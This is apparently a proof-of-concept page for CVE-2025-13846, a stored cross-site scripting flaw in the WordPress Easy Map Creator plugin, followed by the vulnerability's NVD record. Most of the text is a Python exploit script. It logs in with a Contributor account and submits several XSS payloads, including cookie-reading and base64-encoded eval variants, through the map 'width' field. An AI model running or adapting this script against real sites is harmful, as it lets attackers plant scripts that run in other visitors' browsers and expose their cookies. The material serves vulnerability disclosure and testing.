CVE-2025-13846

# CVE-2025-13846 Easy Map Creator Stored XSS PoC # Author: Security Researcher # Target: WordPress Easy Map Creator Plugin <= 3.0.2 import requests from bs4 import BeautifulSoup # Configuration target_url = "http://target-wordpress-site.com" username = "attacker_contributor" # Contributor level account password = "attacker_password" # XSS Payloads for width parameter xss_payloads = [ '100 onerror=alert(document.cookie)', '100"><script>alert(String.fromCharCode(88,83,83))</script>', '100" onfocus="alert(document.domain)" autofocus x="', '100 onload=eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))' ] def get_nonce(login_url): """Extract WordPress nonce for form submission""" response = requests.get(login_url) soup = BeautifulSoup(response.text, 'html.parser') nonce_tag = soup.find('input', {'id': '_wpnonce'}) return nonce_tag['value'] if nonce_tag else None def exploit_stored_xss(): """Exploit the stored XSS vulnerability in Easy Map Creator""" session = requests.Session() # Step 1: Login to WordPress as Contributor login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/" } session.post(login_url, data=login_data) # Step 2: Access Easy Map Creator admin page map_admin_url = f"{target_url}/wp-admin/admin.php?page=easy-map-creator" # Step 3: Create new map with malicious width parameter create_map_url = f"{target_url}/wp-admin/admin.php?page=easy-map-creator&action=new" for payload in xss_payloads: map_data = { '_wpnonce': get_nonce(create_map_url), 'map_title': 'Malicious Map', 'map_width': payload, # XSS injection point 'map_height': '400', 'submit': 'Save Map' } response = session.post(create_map_url, data=map_data) print(f"[*] Payload sent: {payload}") print("[+] XSS payload stored successfully") print("[*] Any user viewing the map will trigger the XSS") if __name__ == "__main__": exploit_stored_xss()

{"cve": {"id": "CVE-2025-13846", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:42.653", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Map Creator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'width' parameter in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/easy-map-creator/tags/3.0.2/easy_map_creator.php#L139", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-map-creator/trunk/easy_map_creator.php#L139", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6e185479-843c-4748-83e5-ae0b300c3fc7?source=cve", "source": "[email protected]"}]}}